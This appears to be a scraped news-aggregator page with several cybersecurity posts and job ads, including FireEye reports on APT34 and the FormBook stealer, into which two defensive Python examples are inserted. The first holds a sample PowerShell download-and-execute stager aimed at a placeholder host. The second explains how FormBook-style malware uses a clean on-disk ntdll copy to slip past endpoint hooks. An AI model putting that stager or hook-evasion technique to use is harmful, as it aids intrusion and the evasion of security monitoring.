

#cybersecurity | hacker | Cloud Infrastructure IAM Lessons from the Capital One Breach

Source: National Cyber Security – Produced By Gregory Evans

Cloud infrastructure is the foundation of more companies than ever. As with any foundation, any crack can lead to significant damage to the infrastructure. One potential crack is a trusted identity with unnecessary and excessive privileges. A “trusted identity” is invariably associated with people — employees, […]

#cybersecurity | #hackerspace | Fortress Information Security Strives to Help Protect Critical Infrastructure

Source: National Cyber Security – Produced By Gregory Evans

The agencies and businesses that make up the backbone of our critical infrastructure have a larger bullseye on their backs than an average company. When it comes to the electric utility providers that manage the power grid, the exposure to risk is exacerbated by the fact that much of the equipment, software, and services come from a limited set of vendors. Fortress Information Security just launched the Asset to Vendor (A2V) Network to mitigate these risks and improve the security posture of the power grid.

The Federal Energy Regulatory Commission (FERC) recognizes the unique threats posed to the power grid and understands that it’s crucial to address these challenges and protect the critical infrastructure. FERC has issued requirements for standardized risk assessments and mandated that electric utility providers prioritize supply chain vendors based on their relative risk. The problem is that many of the 3,000 or so electric providers are small, regional companies that don’t have the budget or resources to do this effectively on their own.

The A2V Network was launched as a joint venture between Fortress and AEP (American Electric Power) to address this challenge and help all electric utility companies collaborate to comply with the FERC regulations and improve protection of the critical infrastructure more efficiently and effectively. Organizations that join the A2V Network will be able to purchase completed vendor assessments for significantly less than it would cost them to conduct a redundant assessment of their own, and participating companies can also contribute completed assessments to build out the A2V Network library.

Reluctance to Share

I had an opportunity to chat with Alex Santos, CEO of Fortress, about the A2V Network and some of the challenges it addresses. He described the supply chain like streets in a community. Just as each person is responsible for their own home and property but shares the roads and pays taxes to share the burden of keeping the roads in good repair, each company is responsible for itself but shares risk exposure from the supply chain, so it makes sense to collaborate and share the burden of mitigating the risk and securing the critical infrastructure.

I asked Santos for his thoughts on why businesses in general—not just electric power providers—seem so reluctant to engage in this sort of sharing and collaborative effort. The two main issues, according to Santos, are that some information is very proprietary, and some information is not very good. Companies want to maintain the privacy of intellectual property and sensitive information. In some cases, there is a competitive advantage associated and sharing it is just bad for business. In other instances, organizations are reluctant to engage in sharing information because what they receive is not useful. If the information is not properly vetted and curated to ensure it is correct and relevant, it creates more problems than it solves.

Santos explained that the A2V Network strives to address both of those challenges. The A2V Network takes information about supply chain risk assessments and provides a platform to easily share it while anonymizing it and protecting the privacy of proprietary data. Part of what the A2V Network also does is to validate the information and make it actionable.

Gaining Momentum

Santos was especially grateful for having AEP as a partner for the launch of the A2V Network. He noted that even though there are 3,000 electric utility providers, only about 150 of those are large enough to be regulated by the North American Electric Reliability Corporation (NERC)—and that the top 15 largest deliver power for 75% of consumers. That leaves nearly 2,900 companies that must comply with the FERC regulation but lack the resources to do it effectively on their own.

He said that having AEP on board is huge because any new movement or initiative requires a first big company to get the ball rolling. AEP showed leadership in taking that initiative and having a company with the size and prestige of AEP involved creates a snowball effect that will entice other electric utility providers to jump on board.

The more companies get involved, the more momentum the A2V Network will have and the greater value it will provide to every participating organization. That, in turn, will attract more companies. It becomes a self-feeding cycle of momentum that will ultimately lead to a more secure critical infrastructure.


The post #cybersecurity | #hackerspace | Fortress Information Security Strives to Help Protect Critical Infrastructure appeared first on National Cyber Security.

View full post on National Cyber Security

#cybersecurity | #hackerspace | Derbycon2019, Matthew Szymanski’s ‘REST In Peace: Abusing GraphQL To Attack Underlying Infrastructure’


Many thanks to Adrian Crenshaw (Irongeek) and his videographer colleagues for sharing their outstanding videos of this last and important DerbyCon 2019.
Visit Irongeek for additional production credits and further information. Subscribe to Irongeek’s content, and provide Patreon support as well.


The post Derbycon2019, Matthew Szymanski’ ‘REST In Peace: Abusing GraphQL To Attack Underlying Infrastructure’ appeared first on Security Boulevard.




IT Infrastructure Manager

CSM Companies, Inc – Madison, WI

The Information Technology Infrastructure Manager is responsible for providing reliable, stable and efficient infrastructure to support the company’s business and to support value creation for the enterprise. The IT Infrastructure Manager is a very hands-on role, working with and leading 1-2 System Administrators in the identification, prioritization, and resolution of critical network, server, storage and system related issues and projects that impact business operations. In addition, the IT Infrastructure Manager will collaborate to identify technologies that can be used to improve the overall health of the company computing environment. The IT Infrastructure Manager will provide level 2 support to the Helpdesk as needed and mentorship to the system administrators to maintain a high level of customer service for internal customer questions, incidents, and service requests.

Primary Duties:
Responsible for overall IT infrastructure stability, resiliency and performance including datacenter and network physical and virtual resources.
Responsible for ensuring appropriate IT infrastructure capacity in order to ensure optimum system performance.
Coordinates and works with resources (internal and external) to meet established project milestones and to achieve project deliverables.
Identifies areas for improvement, develops improvement program and monitors the implementation to increase process efficiency.
Recommends suitable technology infrastructure updates in order to develop long-term and short-term planning.
Assists in developing IT budget for IT infrastructure.
Develop plans for implementation of new projects, perform Project Management.
Explores requirements from CIO and IT team in order to recommend the most suitable IT infrastructure solutions.
Participates in evaluations, recommends and plans implementations of new technologies and platforms to determine alignment with businesses needs.
Elaborates functional requirements into technical specifications in order to ensure effective deployments.
Manages resource availability in order to continuously support the business, including backup administration.
Reviews all new and updated processes and procedures introduced into the production environment to ensure SLA compliance.
Participates in development, maintenance and testing of disaster recovery plans as required & implements improvements.
Performs research on relevant products and services that positively impact company business drivers.
Provides mentoring and professional development of system admin staff.
Provides detailed reports periodically for management.
Manage response to alerts and notifications of after-hours activity.
Oversight and administration of Generator, power, and HVAC/Environmental controls, where applicable.
Tier-2 support as required.
Travel to branches as required.
Off-hour support as required.
Education and/or experience equivalent to a minimum of a Bachelor’s degree from an accredited college or university in computer science or a related discipline, plus 5-10 years of experience in server and network administration
Hands-on experience in the following technology concepts
Firewall configuration and troubleshooting
Network, data, and voice routing and configuration (Cisco/Meraki/3CX/ShoreTel)
Working technical knowledge of SAN technology
Server and PC operating systems (Windows 7 Pro, Windows 10 Pro, Windows Server 2008, Windows Server 2012 and Linux)
Virtual Hypervisor Technologies (VMWare/Hyper-V)
Active Directory Services
Internet Protocols (e.g. DNS, HTTP, SMTP, SSL)
Demonstrated management and leadership skills
Able to identify, prioritize, and solve complex server and network-related problems
Able to work in a fast paced complex and dynamic environment with remote resources
Strong analytical and problem solving skills
Excellent verbal and written communication skills with the ability to present information to all levels of the organization
Strong customer service orientation
Willing to work in a team-oriented, collaborative, geographically dispersed environment

Preferred Certifications:
Professional certifications from Microsoft, VMWare, Cisco, ISACA, Agile Scrum, ITIL, or Six Sigma, etc.


The post IT Infrastructure Manager appeared first on National Cyber Security Ventures.


NATO #Vows to #Develop #Cybersecurity #Infrastructure

Source: National Cyber Security News

NATO Secretary General Jens Stoltenberg said Wednesday at a news conference in Brussels that NATO member states expressed their readiness to modernize the Alliance’s command structure.

“We will establish a new joint force command for the Atlantic, to help protect sea lines of communication between North America and Europe,” Stoltenberg told reporters following the first ministerial session of the current North Atlantic Council. “We will establish a new support command for logistics, reinforcement and military mobility — improving the movement of troops and equipment is essential to our collective deterrence and defense.”

However, the NATO Secretary General did not specify a timeline for the pending modernization.


“We have not made any final decisions on where to locate new land component commands … but we have decided that we need some more new land component commands. I know that several nations have put forward proposals that they are ready to host new land component commands,” Stoltenberg said.
The Secretary General pointed out that the decision on the location of the new commands would be made during the defense ministers’ meeting in June.

“What we decide today is the structure, then we will as we move toward the meeting of defense ministers in June to decide the geographical footprint, where to locate the new commands and also the exact manning level in the new command,” Stoltenberg added.




The international intelligence community always has a keen interest in Iran’s hacking activity. And new research published by the security firm FireEye on Thursday indicates the country’s efforts show no signs of slowing. In fact, a new network reconnaissance group— FireEye calls them Advanced Persistent Threat 34—has spent the last few years burrowing deep into critical infrastructure companies.

Given how aggressively Iran has pursued infrastructure hacking, previously targeting the financial sector and even a dam in upstate New York, the new findings serve as a warning, and highlight the evolving nature of the threat.

FireEye researchers tracked 34 of the group’s attacks on institutions in seven Middle Eastern countries between 2015 and mid-2017, but say APT 34 has been operational since at least 2014. The group appears to target financial, energy, telecommunications, and chemical companies, and FireEye says it has moderate confidence that its hackers are Iranians. They log into VPNs from Iranian IP addresses, adhere to normal Iranian business hours, their work has occasionally leaked Iranian addresses and phone numbers, and their efforts align with Iranian interests, namely targeting the country’s adversaries.

New APT in Town

There isn’t definitive evidence of a direct link between APT 34 and APT 33, an Iranian hacking group and malware distributor FireEye published findings on in September. But researchers have seen APT 34 operating concurrently inside many of the same target networks as other Iranian hackers.

“We have seen, and this is with a lot of the Iranian actors, a very disconcerting or aggressive posture towards critical infrastructure organizations,” says John Hultquist, director of intelligence analysis at FireEye. “APT 33 has targeted a lot of organizations in critical infrastructure in the Middle East and so has APT 34. They obviously represent opportunities for intelligence collection. But we always have to think about the alternative use of those intrusions or accesses as possible means for disruption and destruction, especially given the destructive incidents we’ve already seen with other Iranian actors.”

To establish what Hultquist describes as beachheads, APT 34 uses involved operations to move deeper and deeper into a network, or exploit a toehold within one organization to pivot into another. FireEye has observed the group compromising someone’s email account at a target company, rifling through their archive, and restarting threads as old as a year, to trick the recipient into clicking a malicious attachment. The hackers also use compromised email accounts to spearphish other companies, and leapfrog into their systems as well.

While the APT 34 Iranian hacking activity doesn’t appear to target the United States, any Iranian efforts in that space are noteworthy. The countries have a long history of cyber antagonism, which includes the deployment of Stuxnet, malware thought to be a product of the NSA and their Israeli counterparts, to cripple Iran’s uranium enrichment activities. Tensions between the countries have escalated recently as well, with President Donald Trump recently taking steps to decertify the nuclear agreement between the US and Iran.

‘A Multilayered Approach’
APT 34 uses malicious Excel macros and PowerShell-based exploits to move around networks. The group also has fairly extensive social media operations, deploying fake or compromised accounts to scope out high-profile targets, and using social engineering to get closer to particular organizations. FireEye researchers speculate that APT 34 may be a reconnaissance and persistence unit, focused on finding ways into new networks and broadening access within existing targets. Some evidence indicates that the group may work directly for the Iranian government, but it’s also possible that the hackers are effectively contractors, selling backdoors to the government as they find them.
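The macro-to-PowerShell chain described above is one of the most reliable things to hunt for in endpoint telemetry: an Office application should almost never be the parent of a script host, and macro droppers tend to launch PowerShell with a hidden window, no profile and a base64-encoded command. The following detector is an added example, not code from FireEye, Wired or the page's authors. It assumes Sysmon-style process-creation records with ParentImage, Image and CommandLine fields; the field names, the stager string and every sample event are constructed for illustration.

```python
"""Flag Office-launched PowerShell in process-creation telemetry.

Added example; not code from FireEye, Wired or the page's authors. It assumes
Sysmon-style process-creation records with ParentImage, Image and CommandLine
fields. The field names and every event below are constructed for illustration.
"""
import base64
import re
from typing import Dict, List

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Switches that macro droppers typically hand to PowerShell.
SUSPICIOUS_FLAGS = [
    ("hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("no profile", re.compile(r"(?i)-nop(?:rofile)?\b")),
    ("policy bypass", re.compile(r"(?i)-(?:ep|executionpolicy)\s+bypass")),
]
ENCODED = re.compile(r"(?i)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD_EXEC = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient|"
    r"\biex\b|invoke-expression")


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); '' if absent or malformed."""
    match = ENCODED.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: Dict[str, str]) -> Dict[str, object]:
    """Return {'severity': none|medium|high, 'reasons': [...], 'decoded': str}."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    reasons: List[str] = []
    decoded = ""

    office_child = parent in OFFICE_PARENTS and image in SCRIPT_HOSTS
    if office_child:
        reasons.append(f"{parent} spawned {image}")

    # Look at PowerShell wherever it appears, including nested inside cmd /c.
    if image in {"powershell.exe", "pwsh.exe"} or "powershell" in cmdline.lower():
        for label, pattern in SUSPICIOUS_FLAGS:
            if pattern.search(cmdline):
                reasons.append(label)
        decoded = decode_encoded_command(cmdline)
        if decoded:
            reasons.append("encoded command")
        if DOWNLOAD_EXEC.search(cmdline + " " + decoded):
            reasons.append("download/execute primitive")

    if office_child and len(reasons) > 1:
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons, "decoded": decoded}


def alerts(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Score every event and keep those that warrant a look."""
    hits = []
    for event in events:
        result = score_event(event)
        if result["severity"] != "none":
            hits.append({"pid": event.get("ProcessId", "?"), **result})
    return hits


def encoded_argument(script: str) -> str:
    """Build a -EncodedCommand value the way a dropper would (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry, not real logs. The stager URL is a placeholder.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/p')"
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": "4412", "ParentImage": OFFICE + r"\EXCEL.EXE", "Image": PS,
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + encoded_argument(STAGER)},
    {"ProcessId": "4420", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"ProcessId": "4431", "ParentImage": OFFICE + r"\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "powershell -ep bypass -f %TEMP%\upd.ps1"'},
    {"ProcessId": "4440", "ParentImage": OFFICE + r"\OUTLOOK.EXE",
     "Image": OFFICE + r"\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" C:\Users\a\AppData\Local\Temp\invoice.xls'},
]

if __name__ == "__main__":
    for hit in alerts(SAMPLE_EVENTS):
        print(hit["pid"], hit["severity"], "; ".join(hit["reasons"]))
```

The decoded -EncodedCommand is folded back into the scoring so that a download-and-execute primitive hidden inside base64 still counts; the explorer-launched backup script and Outlook opening an attachment in Excel stay below the alert threshold, which is the distinction that keeps this rule usable on a busy fleet.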

“When you look at this, it’s a multilayered approach,” says Jeff Bardin, the chief intelligence officer of the threat-tracking firm Treadstone 71, which monitors Iranian hacking activity. “They get in and make a lot of modifications, download new malware, manipulate the memory, so it’s definitely pretty sophisticated. And the PowerShell activity has been largely a hallmark of Iranian activity lately. They change their tactics constantly. The more we divulge things we know about them, the more they’ll shift and change.”

Though much remains unknown about APT 34, its capabilities and prowess make the group’s interest in critical infrastructure targets all the more noteworthy, whether it’s tasked with carrying out full operations itself, or charged with laying the groundwork for others to do so.

“This is yet another example of Iranian cyber capability, which only seems to grow every day,” FireEye’s Hultquist says. “It’s a challenge for people who are concerned with Iranian actors, and as geopolitics shifts, the number of people who should be concerned with Iranian actors will probably only increase.”


Information Technology Specialist (Network Infrastructure)

Court Services and Offender Supervision Agency for DC – Washington, DC
$94,796 – $123,234 a year – Full-time, Part-time

Duties Summary: The position is located in the Office of Information Technology (OIT), Court Services and Offender Supervision Agency (CSOSA) for the District of Columbia. Working in […]

CyberSecurity Alert in South Korea and the United States as Data Stealing Malware Attacks the Infrastructure



FormBook is the latest malware being used by attackers targeting manufacturing, defense, and aerospace firms in South Korea and the United States.

According to FireEye researchers, FormBook was identified in numerous distribution campaigns against U.S. targets that used emails carrying malicious XLS, DOC, or PDF files. Similar FormBook campaigns in South Korea used emails carrying malicious files inside ZIP, ACE, ISO, and RAR archives.

FormBook is a data-stealing “form grabber” that has been advertised on hacking forums since 2016. Its capabilities include keylogging, capturing HTTP/SPDY/HTTPS/HTTP2 form submissions and network requests, stealing passwords from browsers and email clients, clipboard monitoring, and taking screenshots.

A wide assortment of distribution mechanisms has been leveraged by the attackers behind these email campaigns to deliver the FormBook malware, as posted on 9th October 2017 on the

As the FireEye researchers note, one distinctive feature of the malware is that it reads the Windows ntdll.dll module from disk into memory and calls that fresh copy’s exported functions directly, which renders API monitoring and user-mode hooking mechanisms ineffective.
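Why a second copy of ntdll.dll read from disk defeats user-mode hooks: a hooking engine patches the first bytes of each exported Nt* stub in the mapped module with a trampoline into its own code, while the file on disk still holds the original stub (mov r10,rcx; mov eax,<ssn>; syscall). Whoever holds the clean copy can both detect the patch and call the system service without passing through the hook. The code below is an added example, not FormBook’s code or anything from FireEye’s report: it diffs constructed in-memory prologues against constructed on-disk ones, names the trampoline form, and recovers the system service number (SSN) from the clean copy. Every address, SSN and byte string is made up for illustration (real SSNs change per Windows build), and no process memory is read.

```python
"""Diff loaded ntdll stubs against a clean on-disk copy to spot user-mode hooks.

Added example; not FormBook's code or anything from FireEye's report. The x64
stub layout (mov r10,rcx; mov eax,<ssn>; syscall; ret) is the real ntdll
pattern, but every address, system service number (SSN) and byte string
below is constructed; no process memory is read.
"""
import struct
from typing import Dict, Optional, Tuple


def clean_stub(ssn: int) -> bytes:
    """Unhooked x64 Nt* stub as it sits in ntdll.dll on disk."""
    return (b"\x4c\x8b\xd1"                      # mov r10, rcx
            + b"\xb8" + struct.pack("<I", ssn)   # mov eax, <ssn>
            + b"\x0f\x05"                        # syscall
            + b"\xc3")                           # ret


def syscall_number(stub: bytes) -> Optional[int]:
    """SSN from a clean stub; None when the prologue has been overwritten."""
    if len(stub) >= 8 and stub[:4] == b"\x4c\x8b\xd1\xb8":
        return struct.unpack_from("<I", stub, 4)[0]
    return None


def rel_jmp_hook(func_va: int, target_va: int) -> bytes:
    """5-byte `jmp rel32` trampoline of the kind hooking engines write."""
    return b"\xe9" + struct.pack("<i", target_va - (func_va + 5))


def abs_jmp_hook(target_va: int) -> bytes:
    """12-byte `mov rax, imm64; jmp rax` trampoline."""
    return b"\x48\xb8" + struct.pack("<Q", target_va) + b"\xff\xe0"


def classify_hook(in_memory: bytes, on_disk: bytes, func_va: int) -> Optional[Dict[str, object]]:
    """Describe the patch on a loaded prologue, or None when it matches the disk copy."""
    if in_memory[:len(on_disk)] == on_disk:
        return None
    info: Dict[str, object] = {
        "ssn_on_disk": syscall_number(on_disk),      # recoverable from the clean copy
        "ssn_in_memory": syscall_number(in_memory),  # gone once the prologue is patched
    }
    if len(in_memory) >= 5 and in_memory[0] == 0xE9:
        rel = struct.unpack_from("<i", in_memory, 1)[0]
        info.update(kind="jmp rel32", target=func_va + 5 + rel)
    elif len(in_memory) >= 6 and in_memory[:2] == b"\xff\x25":
        disp = struct.unpack_from("<i", in_memory, 2)[0]
        info.update(kind="jmp [rip+disp32]", target=func_va + 6 + disp)  # pointer slot, not code
    elif len(in_memory) >= 12 and in_memory[:2] == b"\x48\xb8" and in_memory[10:12] == b"\xff\xe0":
        info.update(kind="mov rax,imm64; jmp rax",
                    target=struct.unpack_from("<Q", in_memory, 2)[0])
    else:
        info.update(kind="unrecognised patch", target=None)
    return info


def audit(loaded: Dict[str, Tuple[int, bytes]], disk: Dict[str, bytes]) -> Dict[str, Dict[str, object]]:
    """loaded: name -> (virtual address, prologue as mapped); disk: name -> clean prologue."""
    hooked = {}
    for name, (va, mem_bytes) in loaded.items():
        verdict = classify_hook(mem_bytes, disk[name], va)
        if verdict is not None:
            hooked[name] = verdict
    return hooked


# Constructed fixtures: arbitrary addresses and SSNs (real SSNs change per Windows build).
BASE = 0x7FFA12340000
EDR_TRAMPOLINE = 0x7FFA0AB00000
POINTER_SLOT = BASE + 0x9000
ADDRS = {"NtClose": BASE + 0x100, "NtWriteVirtualMemory": BASE + 0x200,
         "NtProtectVirtualMemory": BASE + 0x300, "NtCreateFile": BASE + 0x400}
NTDLL_ON_DISK = {"NtClose": clean_stub(0x0F), "NtWriteVirtualMemory": clean_stub(0x3A),
                 "NtProtectVirtualMemory": clean_stub(0x50), "NtCreateFile": clean_stub(0x55)}


def patched(name: str, hook: bytes) -> bytes:
    """Hooking engines overwrite only the first bytes; the tail of the stub survives."""
    clean = NTDLL_ON_DISK[name]
    return hook + clean[len(hook):]


LOADED_IN_MEMORY = {
    "NtClose": (ADDRS["NtClose"], NTDLL_ON_DISK["NtClose"]),
    "NtWriteVirtualMemory": (ADDRS["NtWriteVirtualMemory"], patched(
        "NtWriteVirtualMemory", rel_jmp_hook(ADDRS["NtWriteVirtualMemory"], EDR_TRAMPOLINE))),
    "NtProtectVirtualMemory": (ADDRS["NtProtectVirtualMemory"], patched(
        "NtProtectVirtualMemory", abs_jmp_hook(EDR_TRAMPOLINE + 0x40))),
    "NtCreateFile": (ADDRS["NtCreateFile"], patched(
        "NtCreateFile", b"\xff\x25" + struct.pack("<i", POINTER_SLOT - (ADDRS["NtCreateFile"] + 6)))),
}

if __name__ == "__main__":
    for name, verdict in audit(LOADED_IN_MEMORY, NTDLL_ON_DISK).items():
        print(name, verdict)
```

A defender runs this comparison from a process that maps ntdll itself (read the file, parse the export table, compare each prologue) to learn which functions the endpoint agent has hooked and where its trampolines live; malware such as FormBook runs the same idea in reverse, executing the clean copy so the hooks never see its calls. The caveat is scope: prologue diffing only catches inline user-mode patches, and says nothing about kernel callbacks, ETW providers or hooks placed further into the function body.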

In the archive campaigns, a self-extracting RAR file delivers the payload. When launched, it runs an AutoIt loader that compiles and executes a script; the script decrypts the FormBook payload into memory and then executes it, the researchers confirm.

Over time the researchers have also seen FormBook download NanoCore, a remote access Trojan (RAT) first observed in 2013 and openly sold on the web. Its author, Taylor Huddleston, was arrested in March 2017.

Besides the United States and South Korea, the malware has targeted other countries, including the United Kingdom, France, Poland, Ukraine, Hungary, Russia, Australia, Germany, and the Netherlands. The archive campaigns have also hit the United States, Belgium, Japan, Saudi Arabia, France, Sweden, Germany, and India.

FormBook targets Windows systems, so organisations in these sectors are urged to keep their Windows operating systems patched and up to date. For now, the advice is strictly not to open suspicious emails, click unidentified links, or download unknown attachments from unrecognised senders.


The post CyberSecurity Alert in South Korea and the United States as Data Stealing Malware Attacks the Infrastructure appeared first on National Cyber Security Ventures.


IT Infrastructure Manager – Denver International Airport


  Denver International Airport is the 19th-busiest airport in the world and the sixth-busiest airport in the United States, serving 58.3 million passengers last year and generating more than $26 billion for the region annually. DEN is the largest and newest commercial airport in the United States and consists of…

The post IT Infrastructure Manager – Denver International Airport appeared first on National Cyber Security Ventures.


Tokyo plans cybersecurity hub to protect infrastructure during 2020 Olympics


The government said Thursday it will create a new body to oversee the protection of crucial infrastructure from cyberattacks during the Tokyo Olympics and Paralympics in 2020. The cybersecurity response center will compile and share information with government agencies and companies that operate crucial infrastructure such as transportation and power…

The post Tokyo plans cybersecurity hub to protect infrastructure during 2020 Olympics appeared first on National Cyber Security Ventures.
